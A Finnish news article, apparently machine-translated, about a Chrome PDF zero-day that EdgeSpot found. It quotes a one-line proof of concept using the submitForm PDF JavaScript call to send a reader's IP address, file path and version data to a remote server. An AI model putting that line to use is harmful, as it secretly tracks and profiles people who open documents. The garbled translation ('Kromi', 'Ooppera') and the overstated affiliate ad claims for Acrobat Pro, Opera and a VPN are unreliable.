- EdgeSpot löysi mielenkiintoisen nollapäivän haavoittuvuuden, joka hyödyntää PDF-dokumentteja Chromessa.
- Tämä haavoittuvuus voi vahingoittaa sinua keräämällä arkaluontoisia tietoja tietokoneellesi.
- Tutustu meidän Verkko- ja pilvisivu lisätietoja muista työkaluista ja palveluista.
- Jos olet kiinnostunut selaimista, tarjoamme niistä paljon tietoa Selainkeskus.
Tee kaikista asiakirjoista esteettömiä ja suojattuja Adobe Acrobat Readerin avulla. Tämän asiakirjanhallintatyökalun avulla voit myös allekirjoittaa sähköisesti ja luoda virallisia lomakkeita säästääksesi aikaa työssäsi. Hanki se tietokoneellesi ja voit:
- Avaa, tulosta ja muokkaa kaikkia PDF-tiedostoja ja muita tiedostotyyppejä
- Täytä PDF-lomakkeet helpommin
- Pidä tärkeät asiakirjat salattuina
Hanki kaikki sovellukset erikoishintaan!
Maailman suurin asiakirjahallintaohjelmisto nro 1 on nyt edulliseen hintaan, joten pidä kiirettä!
Hyödyntämispalvelu EdgeSpot löysi kiehtovan Kromi nollapäivän haavoittuvuus hyödyntämällä PDF-dokumentteja.
Haavoittuvuus antaa hyökkääjille mahdollisuuden kerätä arkaluontoisia tietoja käyttämällä haitallisia PDF-tiedostoja, jotka on avattu Chromessa.
Heti kun uhri avaa vastaavat PDF-tiedostot Google Chromessa, haittaohjelma alkaa toimia taustalla keräämällä käyttäjätietoja.
Tiedot välitetään sitten hakkereiden ohjaamalle etäpalvelimelle. Saatat miettiä, mitä tietoja hyökkääjät imevät, ja he kohdistavat seuraavat tiedot tietokoneellesi:
- IP-osoite
- Koko PDF-tiedoston polku järjestelmässä
- Käyttöjärjestelmä- ja Chrome-versiot
Varo haittaohjelmien aiheuttamia PDF-tiedostoja
Asiantuntijat täplikäs että toinen kahdesta verkkotunnuksesta readnotify [.] com tai burpcollaborator [.] netto oli vastaanottamassa tietoja.
He paljastivat, että hyökkääjät käyttävät this.submitForm () PDF Javascript -sovellusliittymä käyttäjien arkaluontoisten tietojen keräämiseksi.
Testasimme sen minimaalisella PoC: llä, yksinkertaisella API-kutsulla this.submitForm (’ http://google.com/test’) saa Google Chromen lähettämään henkilötiedot osoitteeseen google.com.
Tätä Chrome-virhettä hyödynsi kaksi erillistä haitallisten PDF-tiedostojen joukkoa, jotka molemmat levittivät lokakuussa 2017 ja syyskuussa 2018.
Hyökkääjät voivat käyttää kerättyjä tietoja hienosäätääksesi hyökkäyksiä tulevaisuudessa. Raportit viittaavat siihen, että ensimmäinen tiedostoerä on koottu ReadNotifyn PDF-seurantapalvelun avulla.
Käyttäjät voivat käyttää palvelua seuraamaan käyttäjien näkymiä. EdgeSpot ei ole jakanut mitään yksityiskohtia toisen PDF-tiedostojoukon luonteesta.
Nopea vinkki: Vaihda selaimesi Operaksi
Näinä vaikeina aikoina meitä vastaan hyökätään haittaohjelmilla, tietojenkalastelulla ja troijalaisilla jokaisessa vaiheessa, joten meidän on oltava paljon valppaana ja pysyttävä suojattuina.
Ja koska tämä on erityinen Chrome-ongelma, voit välttää uhan ja kaikki muut tietoturvalähtöisellä selaimella Ooppera.
Tässä selaimessa on sisäänrakennettu mainosten esto, joka paitsi poistaa häiriötekijät myös estää analyysiohjelmat, seurantapikselit ja menetelmät tietojen keräämiseksi.
Ja jos haluat olla täysin varma, että pysyt poissa vaaroista, mene sisäänrakennetun taakse VPN palvelu, joka on 100% vapaasti käytettävissä rajoittamattoman ajan.
Ooppera
Opera tarjoaa täydellisen uhkasuojan sisäänrakennetulla mainosten estäjällä ja VPN-palvelulla ilmaiseksi!
Käy verkkosivustolla
Kuinka voin suojautua PDF-haavoittuvuuksilta?
Lataa Adobe Acrobat PRO
Adobe ja Chrome sopivat hyvin PDF-tiedostojen käsittelyyn. Asentamalla Adobe Extension for Chrome -sovelluksen voit tarkistaa ja käsitellä PDF-tiedostoja mieleisekseen poistumatta suosikkiselaimestasi.
Vankasta rakenteestaan huolimatta PDF-tiedostoihin piilotettuja haittaohjelmia ei ehkä havaita, jos käytät Readerin vakioversiota.
Ammattimaista versiota suositellaan takaamaan suojauksesi ja pitämään tietosi poissa hakkereilta.
Vaikka se ei ole ilmainen, maksamasi hinta on melko pieni lukuisista lisäominaisuuksista, mukaan lukien parannettu PDF-tiedostojen suojaus.
Mukana on myös 7 päivän ilmainen kokeilu, jotta voit maistella koko Pro-kokemusta ennen ostoksen tekemistä.
Adobe Acrobat PRO
Pysy kaukana haittaohjelmista lataamalla Adobe Acrobat PRO. Siinä on paljon enemmän ominaisuuksia kuin ilmaisessa versiossa, ja se pitää tietosi turvassa.
Vieraile verkkosivustolla
Jos haluat olla turvallinen Internetissä surffaillessasi, sinun on hankittava täysin omistettu työkalu verkon suojaamiseksi. Asenna yksityinen Internet-yhteys nyt ja turvaa itsesi. Se suojaa tietokonetta hyökkäyksiltä selaamisen aikana, peittää IP-osoitteesi ja estää kaiken ei-toivotun pääsyn.
Exploit-tunnistuspalvelu EdgeSpot halusi varoittaa Chrome-käyttäjiä mahdollisista riskeistä, koska korjaustiedoston ei odotettu vapautuvan lähitulevaisuudessa.
EdgeSpot ilmoitti Googlelle haavoittuvuudesta viime vuonna, ja yritys lupasi julkaista korjaustiedoston huhtikuun lopulla.
Voit kuitenkin harkita ongelman väliaikaista kiertotapaa katsomalla vastaanotetut PDF-asiakirjat paikallisesti toisella lukijaohjelmalla.
Vaihtoehtoisesti voit myös avata PDF-asiakirjat Chromessa irrottamalla järjestelmät Internetistä.
Usein Kysytyt Kysymykset
Kyllä. Mutta jos haluat laajemman valikoiman, tutustu suosikkeihimme Kromiyksityisyyttä laajennukset tämä täydellinen opas.
Ttässä on paljon laajennuksia, jotka sallivat PDF-tiedostot käsittely. Tarkistaa ulos meidän erinomainen opas parhaista PDF-laajennuksista Chromelle.
Se ei, mutta voit aktivoida sen nopeasti. Tässä on meidän kattava opas miten QR-koodigeneraattori otetaan käyttöön Chromessa.
